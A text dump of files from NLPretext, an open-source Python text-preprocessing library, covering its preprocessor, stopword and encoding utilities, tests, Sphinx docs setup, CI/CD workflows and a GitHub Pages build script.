27 | - [ ] I've written tests for all new methods and classes that I created.
28 | - [ ] I've written the docstring in Google format for all the methods and classes that I used.
29 |
--------------------------------------------------------------------------------
/docs/source/_templates/package.rst_t:
--------------------------------------------------------------------------------
1 |
2 | {%- macro automodule(modname, options) -%}
3 | .. automodule:: {{ modname }}
4 | {%- for option in options %}
5 | :{{ option }}:
6 | {%- endfor %}
7 | {%- endmacro %}
8 |
9 | {%- macro toctree(docnames) -%}
10 | .. toctree::
11 | :maxdepth: {{ maxdepth }}
12 | {% for docname in docnames %}
13 | {{ docname }}
14 | {%- endfor %}
15 | {%- endmacro %}
16 |
17 | {%- if is_namespace %}
18 | {{- ["**", pkgname, "**"] | join("") | heading }}
19 | {% else %}
20 | {% set pkg_list = pkgname.split('.') %}
21 | {{- ["**", pkg_list[-1], "**"] | join("") | heading }}
22 | {% endif %}
23 |
24 | {%- if modulefirst and not is_namespace %}
25 | {{ automodule(pkgname, automodule_options) }}
26 | {% endif %}
27 |
28 | {%- if subpackages %}
29 |
30 | {{ toctree(subpackages) }}
31 | {% endif %}
32 |
33 | {%- if submodules %}
34 | {% if separatemodules %}
35 | {{ toctree(submodules) }}
36 | {% else %}
37 | {%- for submodule in submodules %}
38 | {% if show_headings %}
39 | {% set submodule_list = submodule.split('.') %}
40 | {{- [submodule_list[-1]] | join(" ") | e | heading(2) }}
41 | {% endif %}
42 | {{ automodule(submodule, automodule_options) }}
43 | {% endfor %}
44 | {%- endif %}
45 | {%- endif %}
46 |
47 | {%- if not modulefirst and not is_namespace %}
48 |
49 | {{ automodule(pkgname, automodule_options) }}
50 | {% endif %}
51 |
--------------------------------------------------------------------------------
/nlpretext/cli/preprocess.py:
--------------------------------------------------------------------------------
1 | from typing import List
2 |
3 | import typer
4 | from nlpretext.preprocessor import Preprocessor
5 | from nlpretext.textloader import TextLoader
6 | from rich.console import Console
7 |
8 | app = typer.Typer()
9 | console = Console()
10 |
11 |
12 | @app.command()
13 | def run(
14 | input: List[str] = typer.Option( # noqa: B008
15 | [],
16 | "-i",
17 | "--input",
18 | case_sensitive=False,
19 | help="List of files that will be preprocessed",
20 | ),
21 | output: str = typer.Option(
22 | None,
23 | "-o",
24 | "--output",
25 | case_sensitive=False,
26 | help="File that will store the result of the preprocessing",
27 | ),
28 | ) -> None:
29 | """Runs NLPretext on a list of files and outputs the result in parquet format
30 | or shows the result if no output is provided.
31 |
32 | Args:
33 |
34 | input: List of files that will be preprocessed
35 |
36 | output: File that will store the result of the preprocessing
37 | """
38 | text_loader = TextLoader()
39 | preprocessor = Preprocessor()
40 | preprocessed_text_dataframe = text_loader.read_text(input, preprocessor=preprocessor)
41 | if output:
42 | preprocessed_text_dataframe.to_parquet(output)
43 | else:
44 | console.print(preprocessed_text_dataframe)
45 |
--------------------------------------------------------------------------------
/nlpretext/__init__.py:
--------------------------------------------------------------------------------
1 | # GNU Lesser General Public License v3.0 only
2 | # Copyright (C) 2020 Artefact
3 | # licence-information@artefact.com
4 | #
5 | # This program is free software; you can redistribute it and/or
6 | # modify it under the terms of the GNU Lesser General Public
7 | # License as published by the Free Software Foundation; either
8 | # version 3 of the License, or (at your option) any later version.
9 | #
10 | # This program is distributed in the hope that it will be useful,
11 | # but WITHOUT ANY WARRANTY; without even the implied warranty of
12 | # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
13 | # Lesser General Public License for more details.
14 | #
15 | # You should have received a copy of the GNU Lesser General Public License
16 | # along with this program; if not, write to the Free Software Foundation,
17 | # Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301, USA.
18 |
19 | # mypy: disable-error-code="attr-defined"
20 | # mypy: disable-error-code="assignment"
21 |
22 | """All the goto functions you need to handle NLP use-cases, integrated in NLPretext."""
23 |
24 | from importlib.metadata import PackageNotFoundError, version
25 |
26 | from nlpretext.preprocessor import Preprocessor
27 |
28 | try:
29 | __version__ = version(__name__)
30 | except PackageNotFoundError: # pragma: no cover
31 | __version__ = "unknown"
32 |
33 |
34 | __all__ = ["Preprocessor"]
35 |
--------------------------------------------------------------------------------
/.pre-commit-config.yaml:
--------------------------------------------------------------------------------
1 | default_language_version:
2 | python: python3.10
3 |
4 |
5 | repos:
6 | - repo: https://github.com/pre-commit/pre-commit-hooks
7 | rev: v4.5.0
8 | hooks:
9 | - id: trailing-whitespace
10 | - id: end-of-file-fixer
11 | - id: check-yaml
12 | - id: check-toml
13 | - id: check-json
14 | - id: check-added-large-files
15 |
16 | - repo: local
17 | hooks:
18 | - id: isort
19 | name: isort
20 | entry: poetry run isort --settings-path pyproject.toml
21 | types: [python]
22 | language: system
23 | stages: [commit, push]
24 | - id: pyupgrade
25 | name: pyupgrade
26 | entry: poetry run pyupgrade --py38-plus
27 | types: [python]
28 | language: system
29 | stages: [commit, push]
30 | - id: black
31 | name: black
32 | entry: poetry run black --config pyproject.toml
33 | types: [python]
34 | language: system
35 | stages: [commit, push]
36 | - id: ruff
37 |         name: ruff
38 | entry: poetry run ruff check --config pyproject.toml
39 | types: [python]
40 | language: system
41 | stages: [commit, push]
42 | - id: mypy
43 | name: mypy
44 | entry: poetry run mypy
45 | require_serial: true
46 | types: [python]
47 | language: system
48 | stages: [push]
49 | - id: gitleaks
50 | name: gitleaks
51 | entry: make gitleaks
52 | require_serial: true
53 | types: [file]
54 | language: system
55 | pass_filenames: false
56 | stages: [push]
57 |
--------------------------------------------------------------------------------
/docs/scripts/buildsite.sh:
--------------------------------------------------------------------------------
1 | #!/bin/bash
2 |
3 | export SOURCE_DATE_EPOCH=$(git log -1 --pretty=%ct)
4 |
5 | ##############
6 | # BUILD DOCS #
7 | ##############
8 |
9 | # Python Sphinx, configured with source/conf.py
10 | # See https://www.sphinx-doc.org/
11 |
12 | cd docs/
13 |
14 | current_tag=$(git symbolic-ref -q --short HEAD || git describe --tags --exact-match)
15 | current_tag_message=$(git cat-file -p $(git rev-parse $(git tag -l | tail -n1)) | tail -n +6)
16 |
17 | make clean
18 | make apidoc
19 | git add .
20 | git commit -m "Commit needed for multiversioning"
21 |
22 | git pull --tags
23 | git tag -a latest -m "Latest version of the package"
24 |
25 | make multiversion
26 |
27 | #######################
28 | # Update GitHub Pages #
29 | #######################
30 |
31 | docroot=`mktemp -d`
32 | cp -r build/html/* ${docroot}
33 |
34 | cd ..
35 |
36 | git branch -d gh-pages
37 | git checkout --orphan gh-pages
38 | git rm --cached -r .
39 | git clean -fdx
40 |
41 | # Adds .nojekyll file to the root to signal to GitHub that
42 | # directories that start with an underscore (_) can remain
43 | touch .nojekyll
44 |
45 | # Add index.html
46 | cat > index.html <<EOF
47 | <!DOCTYPE html>
48 | <html>
49 |   <head>
50 |     <title>Redirecting to the latest release</title>
51 |     <meta http-equiv="refresh" content="0; url=./latest/index.html" />
52 |   </head>
53 |   <body>
54 |   </body>
55 | </html>
56 | EOF
58 | # Add README
59 | cat > README.md <<EOF
--------------------------------------------------------------------------------
/.github/workflows/ci.yml:
--------------------------------------------------------------------------------
62 |           echo "$HOME/.local/bin" >> $GITHUB_PATH
63 |
64 | - name: Install dependencies
65 | run: |
66 | poetry run pip install --upgrade pip
67 | poetry install -E torch -E dask
68 |
69 | - name: Run safety checks
70 | run: |
71 | STRICT=1 make check-safety
72 |
73 | - name: Lint and format
74 | run: |
75 | make format-code
76 |
77 | - name: Run tests
78 | run: |
79 | make test
80 |
--------------------------------------------------------------------------------
/tests/test_phone_number.py:
--------------------------------------------------------------------------------
1 | # GNU Lesser General Public License v3.0 only
2 | # Copyright (C) 2020 Artefact
3 | # licence-information@artefact.com
4 | #
5 | # This program is free software; you can redistribute it and/or
6 | # modify it under the terms of the GNU Lesser General Public
7 | # License as published by the Free Software Foundation; either
8 | # version 3 of the License, or (at your option) any later version.
9 | #
10 | # This program is distributed in the hope that it will be useful,
11 | # but WITHOUT ANY WARRANTY; without even the implied warranty of
12 | # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
13 | # Lesser General Public License for more details.
14 | #
15 | # You should have received a copy of the GNU Lesser General Public License
16 | # along with this program; if not, write to the Free Software Foundation,
17 | # Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301, USA.
18 | import nlpretext._utils.phone_number as phone
19 | from nlpretext._config.config import SUPPORTED_COUNTRY
20 |
21 |
22 | def test_extract_phone_number():
23 | input_str = "(541) 754-3010 is a US. Phone"
24 | expected = ["(541) 754-3010", "754-3010"]
25 | res = phone.extract_phone_numbers(input_str, countrylist=SUPPORTED_COUNTRY)
26 | assert sorted(res) == sorted(expected)
27 |
28 |
29 | def test_extract_phone_number_us():
30 | input_str = "(541) 754-3010 is a US. Phone"
31 | expected = ["(541) 754-3010"]
32 | res = phone.extract_phone_numbers(input_str, countrylist=["US"])
33 | assert res == expected
34 |
35 |
36 | def test_extract_phone_number_fr():
37 | input_str = "06.00.00.00.00 is a FR Phone"
38 | expected = ["06.00.00.00.00"]
39 | res = phone.extract_phone_numbers(input_str, countrylist=["FR"])
40 | assert res == expected
41 |
42 |
43 | def test_extract_phone_number_international():
44 | input_str = "+33600000000 is an international Phone number"
45 | expected = ["+33600000000"]
46 | res = phone.extract_phone_numbers(input_str, countrylist=["US", "GB", "FR", None])
47 | assert res == expected
48 |
49 |
50 | def test_phone_parser_us():
51 | input_str = "(541) 754-3010"
52 | expected = "+1 541-754-3010"
53 | p = phone.PhoneParser()
54 | p.parse_number(input_str, region_code="US")
55 | res = p.format_number("INTERNATIONAL")
56 | assert res == expected
57 |
58 |
59 | def test_phone_parser_fr():
60 | input_str = "0600000000"
61 | expected = "+33600000000"
62 | p = phone.PhoneParser()
63 | p.parse_number(input_str, region_code="FR")
64 | res = p.format_number("E164")
65 | assert res == expected
66 |
--------------------------------------------------------------------------------
/nlpretext/preprocessor.py:
--------------------------------------------------------------------------------
1 | from typing import Any, Callable, Dict, List, Optional
2 |
3 | from nlpretext.basic.preprocess import fix_bad_unicode, normalize_whitespace, remove_eol_characters
4 | from nlpretext.social.preprocess import (
5 | remove_emoji,
6 | remove_hashtag,
7 | remove_html_tags,
8 | remove_mentions,
9 | )
10 | from sklearn.pipeline import Pipeline
11 | from sklearn.preprocessing import FunctionTransformer
12 |
13 |
14 | class Preprocessor:
15 | def __init__(self):
16 | """Initialize preprocessor object to apply all text transformation."""
17 | self.__operations = []
18 | self.pipeline = None
19 |
20 | def pipe(self, operation: Callable[[Any], Any], args: Optional[Dict[str, Any]] = None) -> None:
21 | """
22 |         Add an operation and its arguments to the preprocessor pipeline.
23 |
24 | Parameters
25 | ----------
26 | operation : callable
27 | text preprocessing function
28 | args : dict of arguments
29 | """
30 | self.__operations.append({"operation": operation, "args": args})
31 |
32 | @staticmethod
33 | def build_pipeline(operation_list: List[Dict[Any, Any]]) -> Pipeline:
34 | """
35 |         Build an sklearn pipeline from an operation list.
36 |
37 | Parameters
38 | ----------
39 | operation_list : iterable
40 | list of __operations of preprocessing
41 |
42 | Returns
43 | -------
44 | sklearn.pipeline.Pipeline
45 | """
46 | return Pipeline(
47 | steps=[
48 | (
49 | operation["operation"].__name__,
50 | FunctionTransformer(operation["operation"], kw_args=operation["args"]),
51 | )
52 | for operation in operation_list
53 | ]
54 | )
55 |
56 | def run(self, text: str) -> str:
57 | """
58 | Apply pipeline to text.
59 |
60 | Parameters
61 | ----------
62 | text : string
63 | text to preprocess
64 |
65 | Returns
66 | -------
67 | string
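68 |
69 |         Examples
70 |         --------
71 |         A sketch of typical use; the sample text is illustrative:
72 |
73 |         >>> from nlpretext.social.preprocess import remove_mentions
74 |         >>> preprocessor = Preprocessor()
75 |         >>> preprocessor.pipe(remove_mentions)
76 |         >>> cleaned = preprocessor.run("@user hello world")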
68 | """
69 | operations = self.__operations
70 | if operations == []:
71 | operations_to_pipe = (
72 | remove_html_tags,
73 | remove_mentions,
74 | remove_emoji,
75 | remove_hashtag,
76 | remove_eol_characters,
77 | fix_bad_unicode,
78 | normalize_whitespace,
79 | )
80 | operations = [
81 | {"operation": operation, "args": None} for operation in operations_to_pipe
82 | ]
83 | self.pipeline = self.build_pipeline(operations)
84 | text = self.pipeline.transform(text)
85 | return text
86 |
--------------------------------------------------------------------------------
/nlpretext/_utils/stopwords.py:
--------------------------------------------------------------------------------
1 | # Copyright (C) 2020 Artefact
2 | # licence-information@artefact.com
3 | #
4 | # Licensed under the Apache License, Version 2.0 (the "License");
5 | # you may not use this file except in compliance with the License.
6 | # You may obtain a copy of the License at
7 | #
8 | # http://www.apache.org/licenses/LICENSE-2.0
9 | #
10 | # Unless required by applicable law or agreed to in writing, software
11 | # distributed under the License is distributed on an "AS IS" BASIS,
12 | # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
13 | # See the License for the specific language governing permissions and
14 | # limitations under the License
15 |
16 |
17 | from typing import List
18 |
19 | from nlpretext._config.stopwords import STOPWORDS
20 | from stop_words import LANGUAGE_MAPPING as _LANGUAGE_MAPPING
21 | from stop_words import get_stop_words as _get_stop_words
22 |
23 |
24 | def get_stopwords(lang: str = "en") -> List[str]:
25 | """Input a language code, returns a list of stopwords for the specified language.
26 |
27 | Parameters
28 | ----------
29 | lang : str
30 | Supported languages: ['ar', 'bg', 'ca', 'cz', 'da', 'nl', 'en',
31 | 'fi', 'fr', 'de', 'hi', 'hu', 'id', 'it', 'nb', 'pl', 'pt', 'ro', 'ru',
32 | 'sk', 'es', 'sv', 'tr', 'uk', 'vi', 'af', 'ha', 'so', 'st', 'sw', 'yo',
33 | 'zu', 'da', 'de', 'es', 'et', 'fi', 'fr', 'hr', 'hu', 'it', 'ko', 'nl',
34 | 'no', 'pl', 'pt', 'ru', 'sv', 'tr', 'zh', 'eo', 'he', 'la', 'sk', 'sl',
35 | 'br', 'ca', 'cs', 'el', 'eu', 'ga', 'gl', 'hy', 'id', 'ja', 'lv', 'th',
36 | 'ar', 'bg', 'bn', 'fa', 'hi', 'mr', 'ro', 'en']
37 |
38 | Returns
39 | -------
40 | list
41 | list of stopwords for a given language
42 |
43 | Raises
44 | ------
45 | ValueError
46 |         When the requested language is not available or the language code is invalid
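47 |
48 |     Examples
49 |     --------
50 |     A sketch of typical use:
51 |
52 |     >>> stopwords = get_stopwords("en")
53 |     >>> "the" in stopwords
54 |     True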
47 | """
48 | if isinstance(lang, str) and len(lang) == 2:
49 | lang = lang.lower()
50 | custom_stopwords = STOPWORDS
51 | stopwords = []
52 |
53 | supported_lang_lib = list(_LANGUAGE_MAPPING.keys())
54 | supported_lang_custom = list(custom_stopwords.keys())
55 | supported_lang = supported_lang_lib + supported_lang_custom
56 | if lang in supported_lang:
57 | if lang in supported_lang_lib:
58 | stopwords += _get_stop_words(lang)
59 | if lang in supported_lang_custom:
60 | stopwords += custom_stopwords[lang]
61 | else:
62 | raise ValueError(
63 | "Language not available yet or incorrect country code."
64 | f" Supported languages: {supported_lang}"
65 | )
66 | else:
67 | raise ValueError('Please input a valid country code, in 2 letters. Eg. "us" for USA. ')
68 | return list(set(stopwords))
69 |
--------------------------------------------------------------------------------
/tests/test_data_augmentation.py:
--------------------------------------------------------------------------------
1 | import pytest
2 | from nlpretext.augmentation.text_augmentation import (
3 | CouldNotAugment,
4 | UnavailableAugmenter,
5 | get_augmenter,
6 | process_entities_and_text,
7 | )
8 |
9 |
10 | @pytest.mark.parametrize(
11 | "text, text_augmented, entities, expected",
12 | [
13 | (
14 | "I want to buy a small black handbag.",
15 | "I want to acquire a small black handbag",
16 | [
17 | {"entity": "Size", "word": "small", "startCharIndex": 16, "endCharIndex": 21},
18 | {"entity": "Color", "word": "black", "startCharIndex": 22, "endCharIndex": 27},
19 | {"entity": "Type", "word": "handbag", "startCharIndex": 28, "endCharIndex": 35},
20 | ],
21 | {"type": str, "entities": ["black", "handbag", "small"]},
22 | ),
23 | (
24 | "I want to buy a small black handbag.",
25 | "I would like to buy a black small handbag",
26 | [
27 | {"entity": "Size", "word": "small", "startCharIndex": 16, "endCharIndex": 21},
28 | {"entity": "Color", "word": "black", "startCharIndex": 22, "endCharIndex": 27},
29 | {"entity": "Type", "word": "handbag", "startCharIndex": 28, "endCharIndex": 35},
30 | ],
31 | {"type": str, "entities": ["black", "handbag", "small"]},
32 | ),
33 | ],
34 | )
35 | def test_process_entities_and_text_not_altered(text, text_augmented, entities, expected):
36 | augmented_text, augmented_entities = process_entities_and_text(entities, text, text_augmented)
37 | augmented_entities = sorted(el["word"] for el in augmented_entities)
38 | assert {"type": type(augmented_text), "entities": augmented_entities} == expected
39 |
40 |
41 | @pytest.mark.parametrize(
42 | "text, text_augmented, entities",
43 | [
44 | (
45 | "I live in New York and I am looking for a lipstick",
46 | "I live in New and York I an looking for a lipstick",
47 | [
48 | {"entity": "City", "word": "New York", "startCharIndex": 10, "endCharIndex": 18},
49 | {"entity": "Type", "word": "bag", "startCharIndex": 42, "endCharIndex": 50},
50 | ],
51 | )
52 | ],
53 | )
54 | def test_process_entities_and_text_altered(text, text_augmented, entities):
55 | with pytest.raises(CouldNotAugment) as excinfo:
56 | process_entities_and_text(entities, text, text_augmented)
57 | assert (
58 | str(excinfo.value) == "Text was not correctly augmented because entities were altered"
59 | )
60 |
61 |
62 | def test_get_augmenter():
63 | method = "ppdb_synonym"
64 | with pytest.raises(UnavailableAugmenter) as excinfo:
65 | get_augmenter(method)
66 | assert (
67 | str(excinfo.value)
68 | == "The given augmenter is not supported. You must choose one \
69 | of the following: wordnet_synonym or aug_sub_bert"
70 | )
71 |
--------------------------------------------------------------------------------
/nlpretext/_utils/file_loader.py:
--------------------------------------------------------------------------------
1 | # GNU Lesser General Public License v3.0 only
2 | # Copyright (C) 2020 Artefact
3 | # licence-information@artefact.com
4 | #
5 | # This program is free software; you can redistribute it and/or
6 | # modify it under the terms of the GNU Lesser General Public
7 | # License as published by the Free Software Foundation; either
8 | # version 3 of the License, or (at your option) any later version.
9 | #
10 | # This program is distributed in the hope that it will be useful,
11 | # but WITHOUT ANY WARRANTY; without even the implied warranty of
12 | # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
13 | # Lesser General Public License for more details.
14 | #
15 | # You should have received a copy of the GNU Lesser General Public License
16 | # along with this program; if not, write to the Free Software Foundation,
17 | # Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301, USA.
18 | # mypy: disable-error-code="assignment"
19 |
20 | from typing import List, Union
21 |
22 | import chardet
23 | from nlpretext._config import constants
24 |
25 |
26 | def detect_encoding(file_path_or_string: Union[str, bytes], n_lines: int = 100) -> str:
27 | """
28 | Predict a file's encoding using chardet.
29 |
30 | Parameters
31 | ----------
32 | file_path_or_string : string
33 | if filepath, will open the file. Otherwise will predict from the string
34 | n_lines : int
35 |         number of lines to read for the prediction
36 |
37 | Returns
38 | -------
39 | string
40 | the code of the detected encoding
41 | """
42 | if isinstance(file_path_or_string, bytes):
43 | rawdata = file_path_or_string
44 | else:
45 | with open(file_path_or_string, "rb") as f:
46 | rawdata = b"".join([f.readline() for _ in range(n_lines)])
47 |     detection = chardet.detect(rawdata)
48 |     return detection["encoding"]
49 |
50 |
51 | def check_text_file_format(filepath: Union[str, List[str]]) -> str:
52 | """
53 | Retrieve format of a file path or list of files path, among .csv, .json, .parquet and .txt.
54 |
55 | Parameters
56 | ----------
57 | filepath : str | list(str)
58 | A filepath with wildcard (eg. *.txt), or a list of filepaths.
59 |
60 | Returns
61 | -------
62 | str
63 | Format of the specified file path, among .json, .csv, .parquet or .txt
64 | """
65 | pattern = constants.TEXT_FILE_FORMATS_PATTERN
66 | if not isinstance(filepath, (list, tuple)):
67 | filepath = [filepath]
68 | format_re_list = [pattern.match(path) for path in filepath]
69 | format_list = [format_re.group(1) for format_re in format_re_list if format_re]
70 | if len(set(format_list)) > 1:
71 | raise ValueError(f"Multiple file formats found in file path list: {format_list}")
72 | if None in format_re_list:
73 | raise ValueError(
74 | "Unrecognized format among specified files, only .csv, .json, .parquet and .txt accepted" # noqa: E501
75 | )
76 | file_format = format_list[0]
77 | return file_format
78 |
--------------------------------------------------------------------------------
/docs/source/conf.py:
--------------------------------------------------------------------------------
1 | # Configuration file for the Sphinx documentation builder.
2 | #
3 | # This file only contains a selection of the most common options. For a full
4 | # list see the documentation:
5 | # https://www.sphinx-doc.org/en/master/usage/configuration.html
6 |
7 | # -- Path setup --------------------------------------------------------------
8 |
9 | # If extensions (or modules to document with autodoc) are in another directory,
10 | # add these directories to sys.path here. If the directory is relative to the
11 | # documentation root, use os.path.abspath to make it absolute, like shown here.
12 | #
13 | import os
14 | import sys
15 |
16 | sys.path.insert(0, os.path.abspath(".."))
17 |
18 |
19 | # -- Project information -----------------------------------------------------
20 |
21 | project = "nlpretext"
22 | author = "artefactory"
23 |
24 | # -- General configuration ---------------------------------------------------
25 |
26 | # Add any Sphinx extension module names here, as strings. They can be
27 | # extensions coming with Sphinx (named 'sphinx.ext.*') or your custom
28 | # ones.
29 | extensions = [
30 | "sphinx.ext.autodoc",
31 | "sphinx.ext.autosummary",
32 | "sphinx.ext.intersphinx",
33 | "sphinx.ext.mathjax",
34 | "sphinx.ext.napoleon",
35 | "sphinx.ext.todo",
36 | "sphinx.ext.viewcode",
37 | "recommonmark",
38 | "nbsphinx",
39 | "sphinx_multiversion",
40 | "sphinx_autodoc_typehints",
41 | "sphinx_rtd_theme",
42 | ]
43 |
44 | source_suffix = {
45 | ".rst": "restructuredtext",
46 | ".txt": "restructuredtext",
47 | ".md": "markdown",
48 | }
49 |
50 | source_parsers = {".md": "recommonmark.parser.CommonMarkParser"}
51 |
52 | nbsphinx_execute = "never"
53 |
54 | github_url = "https://github.com/artefactory/NLPretext"
55 |
56 | smv_prefer_remote_refs = False
57 | smv_remote_whitelist = None
58 | smv_prebuild_command = (
59 | "poetry run sphinx-apidoc -f -o source/apidoc/ "
60 | "../nlpretext/ "
61 | "--implicit-namespaces -M -t source/_templates"
62 | )
63 |
64 | # Add any paths that contain templates here, relative to this directory.
65 | templates_path = ["_templates"]
66 |
67 | # Autodoc parameters
68 | always_document_param_types = True
69 | add_module_names = False
70 | autodoc_member_order = "bysource"
71 |
72 | # -- Options for HTML output -------------------------------------------------
73 |
74 | # The theme to use for HTML and HTML Help pages. See the documentation for
75 | # a list of builtin themes.
76 |
77 | html_theme = "sphinx_rtd_theme"
78 |
79 | github_url = "https://www.github.com/artefactory/NLPretext"
80 |
81 |
82 | # Add any paths that contain custom static files (such as style sheets) here,
83 | # relative to this directory. They are copied after the builtin static files,
84 | # so a file named "default.css" will overwrite the builtin "default.css".
85 | html_static_path = ["_static"]
86 |
87 | # -- Options for LaTeX output ------------------------------------------------
88 |
89 | latex_elements = {
90 | # Font packages
91 | "fontpkg": "\\usepackage{amsmath, amsfonts, amssymb, amsthm}"
92 | }
93 |
--------------------------------------------------------------------------------
/docs/source/tutorials/basic_notebook.ipynb:
--------------------------------------------------------------------------------
1 | {
2 | "cells": [
3 | {
4 | "cell_type": "markdown",
5 | "metadata": {},
6 | "source": [
7 | "# How to use the package in a notebook\n",
8 | "\n",
9 | "\n",
10 | "\n",
11 | "\n",
12 | "\n",
13 | "\n",
14 | "\n",
15 | "\n",
16 | "\n",
17 | "### *nlpretext*\n",
18 | "\n",
19 | "\n",
20 | "\n",
21 | "## Installing from the main branch\n",
22 | "\n",
23 | "To install the library from the main branch, you can run the following cell:"
24 | ]
25 | },
26 | {
27 | "cell_type": "code",
28 | "execution_count": null,
29 | "metadata": {
30 | "pycharm": {
31 | "name": "#%%\n"
32 | }
33 | },
34 | "outputs": [],
35 | "source": [
36 | "%pip install git+ssh://git@github.com/artefactory/NLPretext.git@main"
37 | ]
38 | },
39 | {
40 | "cell_type": "markdown",
41 | "metadata": {},
42 | "source": [
43 | "## Installing from a specific release\n",
44 | "\n",
45 | "To install the library from a specific release, you can run the following cell:"
46 | ]
47 | },
48 | {
49 | "cell_type": "code",
50 | "execution_count": null,
51 | "metadata": {
52 | "pycharm": {
53 | "name": "#%%\n"
54 | }
55 | },
56 | "outputs": [],
57 | "source": [
58 | "%pip install git+ssh://git@github.com/artefactory/NLPretext.git@v1.0.5"
59 | ]
60 | },
61 | {
62 | "cell_type": "markdown",
63 | "metadata": {},
64 | "source": [
65 | "## Using the package\n",
66 | "\n",
67 | "You can now import and run whatever is in the package:"
68 | ]
69 | },
70 | {
71 | "cell_type": "code",
72 | "execution_count": null,
73 | "metadata": {
74 | "pycharm": {
75 | "name": "#%%\n"
76 | }
77 | },
78 | "outputs": [],
79 | "source": [
80 | "from nlpretext.basic.preprocess import replace_emails\n",
81 | "\n",
82 | "example = \"I have forwarded this email to obama@whitehouse.gov\"\n",
83 | "example = replace_emails(example, replace_with=\"*EMAIL*\")"
84 | ]
85 | },
86 | {
87 | "cell_type": "code",
88 | "execution_count": null,
89 | "metadata": {
90 | "pycharm": {
91 | "name": "#%%\n"
92 | }
93 | },
94 | "outputs": [],
95 | "source": [
96 | "print(example)"
97 | ]
98 | }
99 | ],
100 | "metadata": {
101 | "kernelspec": {
102 | "display_name": "Python 3",
103 | "language": "python",
104 | "name": "python3"
105 | },
106 | "language_info": {
107 | "codemirror_mode": {
108 | "name": "ipython",
109 | "version": 3
110 | },
111 | "file_extension": ".py",
112 | "mimetype": "text/x-python",
113 | "name": "python",
114 | "nbconvert_exporter": "python",
115 | "pygments_lexer": "ipython3",
116 | "version": "3.7.9"
117 | }
118 | },
119 | "nbformat": 4,
120 | "nbformat_minor": 1
121 | }
122 |
--------------------------------------------------------------------------------
/.github/workflows/cd.yml:
--------------------------------------------------------------------------------
1 | name: Continuous Deployment
2 | on:
3 | release:
4 | types: [published]
5 |
6 | jobs:
7 |
8 | docker:
9 |
10 | runs-on: ubuntu-latest
11 |
12 | steps:
13 | - name: Checkout
14 | uses: actions/checkout@v4
15 |
16 | - name: Set up Docker Buildx
17 | uses: docker/setup-buildx-action@v3
18 |
19 | - name: Login to GitHub Container Registry
20 | uses: docker/login-action@v3
21 | with:
22 | username: ${{ github.actor }}
23 | password: ${{ secrets.GITHUB_TOKEN }}
24 | registry: ghcr.io
25 |
26 | - name: Set tag name
27 | id: tag
28 | run: echo "tag_name=${GITHUB_REF//\//-}" >> $GITHUB_OUTPUT
29 | env:
30 | GITHUB_REF: ${{ github.ref }}
31 |
32 | - name: Build and push
33 | uses: docker/build-push-action@v4
34 | with:
35 | context: .
36 | file: ./docker/Dockerfile
37 | push: true
38 | tags: |
39 | ghcr.io/artefactory/nlpretext:${{ steps.tag.outputs.tag_name }}
40 | ghcr.io/artefactory/nlpretext:latest
41 | cache-from: type=registry,ref=ghcr.io/artefactory/nlpretext:latest
42 | cache-to: type=inline
43 |
44 | - name: Scan image
45 | uses: anchore/scan-action@v3
46 | id: scan
47 | with:
48 | image: "ghcr.io/artefactory/nlpretext:${{ steps.tag.outputs.tag_name }}"
49 | output-format: table
50 |
51 | - name: upload Anchore scan SARIF report
52 | if: success() || failure()
53 | uses: github/codeql-action/upload-sarif@v3
54 | with:
55 | sarif_file: ${{ steps.scan.outputs.sarif }}
56 |
57 | documentation_and_package:
58 |
59 | runs-on: ubuntu-latest
60 |
61 | strategy:
62 | matrix:
63 | python-version: ["3.8"]
64 |
65 | steps:
66 |
67 | - name: Checkout
68 | uses: actions/checkout@v4
69 |
70 | - name: Set up Python ${{ matrix.python-version }}
71 | uses: actions/setup-python@v4
72 | with:
73 | python-version: ${{ matrix.python-version }}
74 |
75 | - name: Install poetry and pandoc
76 | run: |
77 | sudo apt-get install pandoc
78 | make download-poetry
79 |
80 | - name: Set up cache
81 | uses: actions/cache@v3.3.2
82 | with:
83 | path: ~/.cache/pypoetry/virtualenvs
84 | key: venv-${{ matrix.python-version }}-${{ hashFiles('pyproject.toml') }}-${{ hashFiles('poetry.lock') }}
85 |
86 | - name: Set Poetry Path
87 | run: |
88 | echo "$HOME/.poetry/bin" >> $GITHUB_PATH
89 |
90 | - name: Install dependencies
91 | run: |
92 | poetry install -E torch -E dask
93 |
94 | - name: Publish to PyPI
95 | env:
96 | PYPI_TOKEN: ${{ secrets.PYPI_TOKEN }}
97 | run: |
98 | poetry config pypi-token.pypi $PYPI_TOKEN
99 | poetry publish --build
100 |
101 | - name: Run build script for Sphinx pages
102 | run: |
103 | poetry run git config --global user.name "Github-Pages Bot"
104 | poetry run git config --global user.email "github-pages@artefactory.com"
105 | poetry run sh docs/scripts/buildsite.sh
106 | shell: bash
107 |
--------------------------------------------------------------------------------
/nlpretext/token/preprocess.py:
--------------------------------------------------------------------------------
1 | # Copyright (C) 2020 Artefact
2 | # licence-information@artefact.com
3 | #
4 | # Licensed under the Apache License, Version 2.0 (the "License");
5 | # you may not use this file except in compliance with the License.
6 | # You may obtain a copy of the License at
7 | #
8 | # http://www.apache.org/licenses/LICENSE-2.0
9 | #
10 | # Unless required by applicable law or agreed to in writing, software
11 | # distributed under the License is distributed on an "AS IS" BASIS,
12 | # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
13 | # See the License for the specific language governing permissions and
14 | # limitations under the License
15 |
16 |
17 | from typing import List, Optional
18 |
19 | import re
20 |
21 | from nlpretext._utils.stopwords import get_stopwords
22 |
23 |
24 | def remove_stopwords(
25 | tokens: List[str], lang: str, custom_stopwords: Optional[List[str]] = None
26 | ) -> List[str]:
27 | """
28 | Remove stopwords from a list of tokens.
29 | eg. 'I like when you move your body !' -> 'I move body !'.
30 |
31 | Parameters
32 | ----------
33 | tokens: list(str)
34 | list of tokens
35 | lang: str
36 | language iso code (e.g. "en")
37 | custom_stopwords : list(str)|None
38 | list of custom stopwords to add. None by default
39 |
40 | Returns
41 | -------
42 | list
43 | tokens without stopwords
44 |
45 | Raises
46 | ------
47 | ValueError
48 | If the input is not a list
49 | """
50 | stopwords = get_stopwords(lang)
